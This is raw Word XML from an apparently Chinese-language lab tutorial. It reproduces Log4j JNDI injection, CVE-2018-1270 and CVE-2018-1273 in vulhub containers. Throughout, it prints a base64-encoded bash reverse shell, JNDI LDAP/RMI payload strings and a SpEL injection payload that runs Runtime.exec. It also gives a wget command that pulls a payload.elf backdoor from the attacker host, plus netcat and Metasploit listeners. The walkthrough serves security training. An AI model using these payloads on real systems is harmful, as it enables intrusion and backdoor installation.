    <w:p w14:paraId="285E4B5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-C "bash -c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447C28C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{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0OS4xMjgvNzc3NyAwPiYx}|{base64,-d}|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A356FF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{bash,-i}" -A "192.168.249.128"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1686B2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5F9D521A" wp14:editId="316393A0">
            <wp:extent cx="6476365" cy="2747645"/>
            <wp:effectExtent l="0" t="0" r="635" b="10795"/>
            <wp:docPr id="4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A143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这样我们就部署好了 RMI 和 LDAP 服务的站点，并且得到了 payload 路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55262246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④开启监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FDBC4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再开一个终端，监听我们对应的端口（我这里的 payload 里为 7777）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D02B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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nc -lvvp 7777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE7AFB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54233558" wp14:editId="65C2511A">
            <wp:extent cx="5768340" cy="1234440"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="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A7C1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⑤反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6540764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使用上述给出的 payload 路径构造完整 payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75062921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6AAE2E01" wp14:editId="3727DB38">
            <wp:extent cx="6479540" cy="2402840"/>
            <wp:effectExtent l="0" t="0" r="12700" b="5080"/>
            <wp:docPr id="4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4BEB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比如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF44EC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${jndi:ldap://192.168.249.128:1389/h8sgrk}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E6D1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${jndi:rmi://192.168.249.128:1099/c2kspf}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2C454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我们可以针对不同版本和不同情况使用不同的服务和不同的 payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C699B0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同样这里需要对 payload 进行 URL 编码后再传入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6DB2F6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0F11BAAE" wp14:editId="363355B1">
            <wp:extent cx="6478270" cy="808355"/>
            <wp:effectExtent l="0" t="0" r="13970" b="14605"/>
            <wp:docPr id="4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698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JNDI 注入工具的终端显示如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39181192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6A6B2EC8" wp14:editId="2CEE9370">
            <wp:extent cx="6477635" cy="2499360"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="4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6EA59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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="579AEEED" wp14:editId="6DCCDF9F">
            <wp:extent cx="6475730" cy="2887345"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8255"/>
            <wp:docPr id="5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9502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查看刚才监听的端口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4600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已经建立连接，反弹 shell 成功，我们便可以执行想要执行的命令了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA3C18E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67ABDBAF" wp14:editId="4717AB68">
            <wp:extent cx="6478270" cy="2034540"/>
            <wp:effectExtent l="0" t="0" r="13970" b="7620"/>
            <wp:docPr id="5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55176" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:spacing w:before="100" w:line="0" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0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0" w:name="_Toc21442"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>三、Java Spring</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>框架漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7252CC7E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3.1Spring与SpEL介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7BF98D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①Spring介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4821991F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Spring框架指的是SpringFramework，是种轻量级开发框架，旨在提高开发效率及系统的可维</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC20B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护性。Spring是很多模块的集合，主要包括八方面：核心技术，测试，数据访问，web应用，web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227EE56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响应，集成，语言及附录，常用核心功能包括IOC，AOP及MVC。Spring 3.0后引入了SpEL。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793304EB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②SpEL介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3550922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SpEL是基于spring的一个表达式语言，能够在运行时动态执行一些运算甚至一些指令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0483EA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就使用方法上来看，一共分为三类，分别是直接在注解中使用，在XML文件中使用和直接在代</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B45915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码块中使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E638E2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③SpEL原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5921145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1.表达式：可以认为就是传入的字符串内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6516FA9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2.解析器：将字符串解析为表达式内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9865A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3.上下文：表达式对象执行的环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A804F4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4.根对象和活动上下文对象：根对象是默认的活动上下文对象，活动上下文对象表示了当前表达式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476DEC39" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:firstLineChars="100" w:firstLine="24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操作的对象Spring框架特征。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C1E99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lastRenderedPageBreak/>
        <w:t>3.2Spring框架特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFEAFE4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①W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eb应用程序ico小图标是个绿叶子</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAEB5A4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72177EA8" wp14:editId="0A62F6FC">
            <wp:extent cx="6478905" cy="1824990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:srcRect b="23767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1923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②看报错页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6580354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如果默认报错页面没有修复，那就是长这样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028884F1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11A9D015" wp14:editId="3AA06163">
            <wp:extent cx="6475730" cy="1882775"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
            <wp:docPr id="5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0C21B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③用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wappalyzer插件识别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D035442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35C4EFCD" wp14:editId="5F306755">
            <wp:extent cx="6057900" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="5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5FA4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④浏览器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f12看X-Application-Context头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F95CD34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5EF91C3E" wp14:editId="15BD53BD">
            <wp:extent cx="6474460" cy="2272030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="13970"/>
            <wp:docPr id="5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E0753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569BE746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36044664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  <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Spring_Messaging远程命令执行漏洞</w:t>
      </w:r>
      <w:r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  <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2018-1270</w:t>
      </w:r>
      <w:r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  <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D3BA0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①漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB5460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Spring框架中通过消息传递模(spring-messaging)来实现它的简单消息协议STOMP (STOMP是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484CAA1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一种封装WebSocket的简单消息协议)。攻击者可以通过建立WebSocket连接并发送一条消息造成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4026715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远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD65ABD" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>原理详解：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在Spring Framework的低版本中，spring-messaging模块为框架提供了消息传递支持，其上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4363D97B" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>层协议使用STOMP，底层通信依赖于SockJS。STOMP消息代理在处理客户端消息时存在一个安全漏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689B0ED6" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>洞，即SpEL（Spring Expression Language）表达式注入。在spring-messaging中，客户端可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9508B4" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>订阅消息，并通过使用selector来过滤消息。这些selector是用SpEL表达式编写的，并且在解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B9684" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>析时用了StandardEvaluationContext类，这可能导致远程代码执行攻击，因为恶意用户可以通过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274A177A" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发送包含特制SpEL表达式的消息来执行未授权的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60736EC5" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:leftChars="228" w:left="479"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用Spring Security项目中的权限认证，可以在一定程度上增加漏洞利用难度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476D786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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Spring Framework 5.0到5.0.4、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Spring框架4.3到4.3.15</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>不支持的旧版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0AC0F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②漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC58E7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打开vulhub上对应的漏洞容器——访问网址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF77552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1B422BA4" wp14:editId="5490EBF9">
            <wp:extent cx="6480810" cy="1328420"/>
            <wp:effectExtent l="0" t="0" r="11430" b="12700"/>
            <wp:docPr id="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CC1E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直接使用exp利用工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8873B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该漏洞是在订阅时插入SpEL表达式，对方向此订阅发送消息时才会触发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CD274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所以需在漏洞 exploit.py 文件里指定对应信息：地址改为目标IP地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19688DC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Vps的IP和端口指向监听主机的IP和端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B150ED2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56B98E8A" wp14:editId="279E313B">
            <wp:extent cx="6480175" cy="1785620"/>
            <wp:effectExtent l="0" t="0" r="12065" b="12700"/>
            <wp:docPr id="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793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开启监听：nc -lvvp 1122    然后执行exp工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C4EE2D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7AD369E4" wp14:editId="1B923848">
            <wp:extent cx="6477635" cy="1181735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:srcRect t="7459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1FAD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反弹shell成功：目标对应目录创建文件成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40317A7A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5385DDB9" wp14:editId="5197EB8E">
            <wp:extent cx="6479540" cy="1800225"/>
            <wp:effectExtent l="0" t="0" r="12700" b="13335"/>
            <wp:docPr id="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68C5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③漏洞预防</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A42E3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使用Spring Security项目中的权限认证，可以在一定程度上增加漏洞利用难度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638E26A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升级版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6EE994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  <w:t xml:space="preserve">3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SpringDataCommons远程命令执行漏洞</w:t>
      </w:r>
      <w:r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  <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2018-127</w:t>
      </w:r>
      <w:r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  <w:t>3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D03C315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①漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545FE12F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Spring Data 是Spring框架中提供底层数据访问的项目模块，Spring Data Commons 是一个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E98C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共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式，导致攻击者可以通过构造特殊的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47AF7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URL请求，造成服务端远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1822F8F1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在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B4FC7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执行任意命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4501B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Spring在补丁中用更安全的SimpleEvaluationContext替换了StandardEvaluationContext。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145FD00E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②漏洞复现——执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD654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打开vulhub上对应的漏洞容器——访问网址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE242FC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4C348F43" wp14:editId="1768CDAA">
            <wp:extent cx="5970905" cy="3547745"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="12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图片 2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:srcRect b="1663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0854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访问用户注册页面，随便点击一个分页面抓包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7574E1EE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200C6711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16DAB78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替换整个数据包：注意将IP地址改对——然后发送数据包——即可执行容易命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC00418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2AA6C1CF" wp14:editId="5A65EDE0">
            <wp:extent cx="5970270" cy="2464435"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="12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" name="图片 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FA30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③漏洞复现——植入后门</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AFEBB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先使用kail生成木马文件：生成方法查看csdn收藏，木马文件含有攻击机IP和监听机IP地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F3858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生成了payload.eif木马文件，想办法在目标主机执行下载指令，下载此木马。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24558985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136395C0" wp14:editId="6E74A563">
            <wp:extent cx="6475730" cy="1978025"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
            <wp:docPr id="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7D20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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>开启http服务将kali中的8000端口映射出去：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3591E4E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通过漏洞注入下载木马的指令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390664A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username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45513D7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getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>下载命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>')")]=asdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AF679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下载后面的指令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对kali机中的后门进行下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C265E5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下载命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wget 192.168.159.134:8000/payload.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD9F1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抓包替换指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACE439A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0BF9C17A" wp14:editId="07801833">
            <wp:extent cx="6476365" cy="2556510"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:docPr id="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2E8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抓包替换，给文件加权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0979EB1B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582D1CD1" wp14:editId="55B751EB">
            <wp:extent cx="3672840" cy="480060"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="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D1A2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MSF中开启4444端口监听，即木马中的4444端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34218F4E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74CE95F6" wp14:editId="345BE64B">
            <wp:extent cx="6478905" cy="1875155"/>
            <wp:effectExtent l="0" t="0" r="13335" b="14605"/>
            <wp:docPr id="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3793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抓包，注入数据包，执行木马文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD9FDF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449EA2B0" wp14:editId="14D412CE">
            <wp:extent cx="6445885" cy="690880"/>
            <wp:effectExtent l="0" t="0" r="635" b="10160"/>
            <wp:docPr id="6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9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21F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成功getshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D43ABB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26E22CA6" wp14:editId="4DD79E8A">
            <wp:extent cx="6475095" cy="1078230"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
            <wp:docPr id="6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0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04F4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  <w:t xml:space="preserve">3.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cloud</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
